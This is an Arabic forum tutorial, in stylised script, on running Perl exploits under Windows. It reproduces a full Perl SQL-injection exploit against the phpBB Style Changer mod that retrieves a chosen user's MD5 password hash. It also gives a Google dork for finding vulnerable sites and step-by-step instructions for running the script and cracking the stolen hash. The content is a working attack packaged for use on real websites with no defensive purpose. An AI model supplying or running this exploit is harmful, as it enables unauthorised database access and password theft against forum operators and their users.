ڪْيًفيًة معّرٍفة آلِثغرٍآتِ آلِمڪْتِوَبة بآلِغة آلِبيًرٍلِ ..؟
عّندِمآ ننظرٍ آلِـﮯ آـﮯ ڪْوَدِ وَ نجدِ فـﮯ بدِآيًتِة :
#!/usr/bin/perl
آذآ عّلِيًنآ آن نعّلِم آن آلِثغرٍة آلِتِـﮯ سّوَف نتِعّآملِ معّهآ هـﮯ آحدِـﮯ آلِثغرٍآتِ آلِمڪْتِوَبة بلِغة آلِبيًرٍلِ ..
طرٍيًقة آلآسّتِغلآلِ :
ـــــــــــــــــــــــــ ـــــــــ
آوَلآ:: آذآ ڪْنتِم من مسّتِخدِميًن بيًئة آلِلِيًوَنڪْسّ فهذآ شـﮯء ممتِآز جدِآ وَ لآ حآجة لآـﮯ برٍنآمج وَ آعّتِقدِ آيًضآ آنڪْم لِسّتِوَ فـﮯ حآجة لِقرٍأة هذـﮯ آلِدِرٍسّ .
آمآ آذآ ڪْنتِم من مسّتِخدِمـﮯ بيًئة آلِوَيًندِوَز فعّلِيًڪْم بأسّتِخدِم برٍنآمج ActivePerl
وَ ذآلِڪْ لِعّملِ ڪْوَبيًلِرٍ لآڪْوَآدِ آلِبيًرٍلِ .
وَ هذة وَصلِة لِلِبرٍنآمج ::
اضغط على ......الجيووووووش...... (http://www.image2view.com/go.php?url=http%3A%2F%2Fwww.cse.unsw.edu.au%2F~hom ecomputing%2Fcdrom%2Fdevel%2Factiveperl%2FActivePe rl-5.8.2.808-MSWin32-x86.msi)
آلآن بعّدِ تِحميًلِ آلِبرٍنآمج وَ عّملِ Setup لِة عّلِـﮯ آلِجهآز سّوَف يًڪْوَن عّلِـﮯ هذآ آلِمسّآرٍ .
C:\Perl
آلآن ڪْلِ شـﮯء تِمآم نبدِآ آلِعّملِ :)
بعّدِ آن نجدِ آحدِ آلِثغرٍآتِ مثآلِ حنآخدِ ڪْمثآلِ آحدِ آلِثغرٍآتِ آلِلِـﮯ وَضعّتِهم لِڪْم فـﮯ قسّم آلِثغرٍآتِ وَ هـﮯ ::
#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#
[email protected] #
#ISRAEL #
################################################## #######
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
################################################## #######
use IO::Socket;
if (@ARGV < 3){
print q{
################################################## ##########
# phpBB Style Changer\Viewer MOD SQL injection Exploit #
# Tested on phpBB 2.0.19 #
# created By SkOd. SED Security Team #
################################################## ##########
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
################################################## ##########
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}
آوَلِ شـﮯء تِسّوَوَوَيًه بعّدِ معّرٍفتِنآ آن هذآ آلِڪْوَدِ لآحدِ ثغرٍآتِ آلِبيًرٍلِ هوَ آننآ نأخدِ آلِڪْوَدِ ڪْلِة Copy وَنضعّة Past فـﮯ آلِـ Notbad وَ نغلِقهآ حيًطلِب منڪْ عّملِ Save نضغط عّلِـﮯ ڪْلِمة Yes آلآن لِدِيًنآ آلِڪْوَدِ عّلِـﮯ هيًئة txt عّلِيًنآ آن نغيًرٍ آلآمتِدِآدِ من txt آلِـﮯ pl نفتِرٍض آننآ سّوَف نقوَم بتِسّميًة آلِملِف exploit.txt عّلِيًنآ آن نغيًرٍ txt لِيًصبح بهذآ آلِشڪْلِ exploit.pl آلآن وَ بعّدِ آلِتِأڪْدِ من آتِمآم هذة آلِعّملِيًة بنجآح عّلِيًنآ آن ضعّ آلِملِف exploit.pl دِآخلِ آلِملِف bin عّلِـﮯ هذآ آلِمسّآرٍ
C:\Perl\bin
وَ بعّدِ وَ ضعّ آلِملِف دِآخلِ هذآ آلِمجلِدِ نذهب آلِـﮯ آلِـ Run آلِموَجوَدِة ضمن قآئمة Start وَ نڪْتِب cmd سّيًظهرٍ لِنآ شآشة آلِدِوَسّ
وَ بعّدِ ذآلِڪْ ::
وَ بعّدِ آن يًتِم عّملِ آلِتِرٍجمة لِملِف آلِبيًرٍلِ وَ يًفتِح آمآمنآ سّوَف نشآهدِ طرٍيًقة آلآسّتِخدِآم آلِخآص لِهذة آلِثغرٍة
وَ ڪْلِ ثغرٍة لِهآ طرٍيًقة آلآسّتِخدِآم آلِخآصة بهآ
نڪْتِب آلِمطلِوَب وَ نظغط آنتِرٍ وَ شوَف آلِنتِيًجة عّلِـﮯ حسّب نوَعّ آلِثغرٍة وَ عّندِ آلِحصوَلِ
عّلِـﮯ آلِبآسّوَرٍدِ بيًڪْوَن بشڪْلِ مشفرٍ مآعّلِيًڪْ آلآ آنڪْ تِفڪْة بأـﮯ برٍنآمج آوَ موَقعّ من موَآقعّ فڪْ آلِبآسّوَرٍدِ ..
وَآن شآء آلِلِه آنيً قدِرٍتِ آفيًدِڪْ ڪْذآ تِقبلِ مرٍوَرٍيً
~ ^